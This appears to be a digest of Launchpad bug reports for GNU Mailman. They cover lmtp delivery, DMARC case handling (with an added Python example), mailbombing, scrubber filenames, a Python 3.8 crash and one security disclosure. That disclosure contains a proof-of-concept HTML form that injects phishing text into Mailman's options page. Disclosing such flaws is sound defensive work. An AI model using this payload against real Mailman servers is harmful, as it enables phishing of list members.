Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses dns queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost", delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2(a)mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
setting localhost in postfix_lmtp breaks delivery
https://bugs.launchpad.net/bugs/544477
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
Public bug reported:
Using Mailman 2.1.33. I noticed that occasionally, DMARC mitigations for
aol.com "From" addresses were not being applied.
I tracked this down to the fact that DNS records can in rare cases return
"AOL" in uppercase in the answer of the TXT record lookup. Here's an
example where I caught it happening:
$ dig _dmarc.aol.com TXT
[...]
;; QUESTION SECTION:
;_dmarc.aol.com. IN TXT
;; ANSWER SECTION:
_dmarc.AOL.com. 492 IN TXT "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"
Note that we requested "_dmarc.aol.com" in the question section, but got back "_dmarc.AOL.com" in the answer section. That case mismatch makes this code in Mailman/Utils.py skip the record:
    for name in want_names:
        if name not in results_by_name:
            continue
I believe the solution is to lowercase the result after the lookup.
Patch attached.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: dmarc
** Patch added: "Lowercase DMARC TXT record label in answer section"
https://bugs.launchpad.net/bugs/1881035/+attachment/5377571/+files/mailman-…
--
https://bugs.launchpad.net/bugs/1881035
Title:
DMARC mitigation fails if TXT record name contains uppercase
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1881035/+subscriptions
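Added example (not part of the report, the attached patch, or Mailman's own code): a lookup that compares DNS owner names case-insensitively, next to an exact-match lookup that misses the record shown in the dig output above. The CNAME handling goes beyond the case in the report; all function names and the example.com/example.net records are assumptions made for illustration.

```python
# Added example. ANSWER is built from the dig output quoted in the report;
# CNAME_ANSWER is constructed sample data (the example.* names are made up).
ANSWER = [("_dmarc.AOL.com.", "TXT",
           "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; "
           "ruf=mailto:d@ruf.agari.com;")]
CNAME_ANSWER = [("_DMARC.Example.COM.", "CNAME", "Policy.Example.NET."),
                ("policy.example.net.", "TXT", "v=DMARC1; p=quarantine")]


def normalize(name):
    """DNS names compare case-insensitively; also drop the trailing root dot."""
    return name.rstrip(".").lower()


def parse_policy(txt):
    """Return the lowercased p= tag of a DMARC TXT record, or None."""
    tags = {}
    for part in txt.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return None
    return tags.get("p", "").lower() or None


def exact_match_policy(qname, answers):
    """Case-sensitive lookup: misses a record whose owner name differs in case."""
    by_name = {owner.rstrip("."): rdata
               for owner, rtype, rdata in answers if rtype == "TXT"}
    return parse_policy(by_name[qname]) if qname in by_name else None


def dmarc_policy(qname, answers):
    """Look up qname in the answer set by normalized name, following CNAMEs."""
    by_name = {}
    for owner, rtype, rdata in answers:
        by_name.setdefault(normalize(owner), []).append((rtype, rdata))
    name, seen = normalize(qname), set()
    while name in by_name and name not in seen:  # 'seen' stops CNAME loops
        seen.add(name)
        records = by_name[name]
        target = next((r for t, r in records if t == "CNAME"), None)
        if target is not None:
            name = normalize(target)
            continue
        policies = [parse_policy(r) for t, r in records if t == "TXT"]
        return next((p for p in policies if p), None)
    return None
```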
Public bug reported:
On a list with a private roster, an attempt to subscribe an address
which is already a member results in a warning notice sent to the target
address. To prevent using this to mailbomb a list member, there is a new
WARN_MEMBER_OF_SUBSCRIBE setting that can be set to No to suppress the
warning.
** Affects: mailman
Importance: Low
Assignee: Mark Sapiro (msapiro)
Status: Fix Committed
--
https://bugs.launchpad.net/bugs/1883017
Title:
It is possible to mailbomb a member of a list with a private roster by
repeatedly posting the subscribe form.
Public bug reported:
There is a report of this at https://mail.python.org/archives/list
/mailman-users(a)python.org/message/CMQGFVJ26IPKJPFHMFIW36ZEB6QMETY7/
While it is unusual, and only occurs with a non-default setting, there
should be no harm in truncating the name to < 255 characters.
** Affects: mailman
Importance: Low
Assignee: Mark Sapiro (msapiro)
Status: Fix Committed
--
https://bugs.launchpad.net/bugs/1884456
Title:
When SCRUBBER_DONT_USE_ATTACHMENT_FILENAME is False, Scrubber can
create names too long.
Public bug reported:
We are using GNU Mailman version 2.1.18-1. This morning one of our
administrators posted to our listserve as normal, but it was not
received. In the archives, it is showing as delivered. We have not had
any issues like this before. Suggestions on how to ensure that our
emails are being posted?
** Affects: mailman
Importance: Undecided
Status: New
--
https://bugs.launchpad.net/bugs/1885172
Title:
Administrator email not delivered
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/
exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker(a)badsite.com"
message will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
Public bug reported:
In Ubuntu 20.04 LTS, it seems that Mailman3 package (3.2.2-1) is
incompatible with Python 3.8 which is used in 20.04.
How to reproduce:
try to subscribe a list through the web interface
https://.../mailman3/postorius/lists/.../
it returns an error and in /var/log/mailman3/mailman.log you will find:
Jun 08 17:35:57 2020 (6830) Uncaught runner exception: module 'time' has no attribute 'clock'
Jun 08 17:35:58 2020 (6830) Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 173, in _one_iteration
    self._process_one_file(msg, msgdata)
  File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 266, in _process_one_file
    keepqueued = self._dispose(mlist, msg, msgdata)
  File "/usr/lib/python3/dist-packages/mailman/runners/incoming.py", line 79, in _dispose
    process(mlist, msg, msgdata, start_chain)
  File "/usr/lib/python3/dist-packages/mailman/core/chains.py", line 79, in process
    link.function(mlist, msg, msgdata)
  File "/usr/lib/python3/dist-packages/mailman/chains/hold.py", line 147, in _process
    request_id = hold_message(mlist, msg, msgdata, SEMISPACE.join(reasons))
  File "/usr/lib/python3/dist-packages/mailman/app/moderator.py", line 88, in hold_message
    request_id = requestsdb.hold_request(
  File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
    return function(args[0], config.db.store, *args[1:], **kws)
  File "/usr/lib/python3/dist-packages/mailman/model/requests.py", line 100, in hold_request
    token = getUtility(IPendings).add(pendable, timedelta(days=5000))
  File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
    return function(args[0], config.db.store, *args[1:], **kws)
  File "/usr/lib/python3/dist-packages/mailman/model/pending.py", line 91, in add
    token = token_factory.new()
  File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 79, in new
    return self._next_unpredictable_id()
  File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 155, in _next_unpredictable_id
    x = random.random() + right_now % 1.0 + time.clock() % 1.0
AttributeError: module 'time' has no attribute 'clock'
This bug has been already fixed in upstream: https://gitlab.com/mailman/mailman/-/commit/ea05bdd0f74ba06d85adad1f7d190a6…
Workaround:
patch the files /usr/lib/python3/dist-packages/mailman/ by hand and
restart mailman.
** Affects: mailman
Importance: Undecided
Status: New
** Affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
** Tags: mailman3
** Also affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
--
https://bugs.launchpad.net/bugs/1882660
Title:
Mailman and Python 3.8 incompatibility - unable to subscribe a list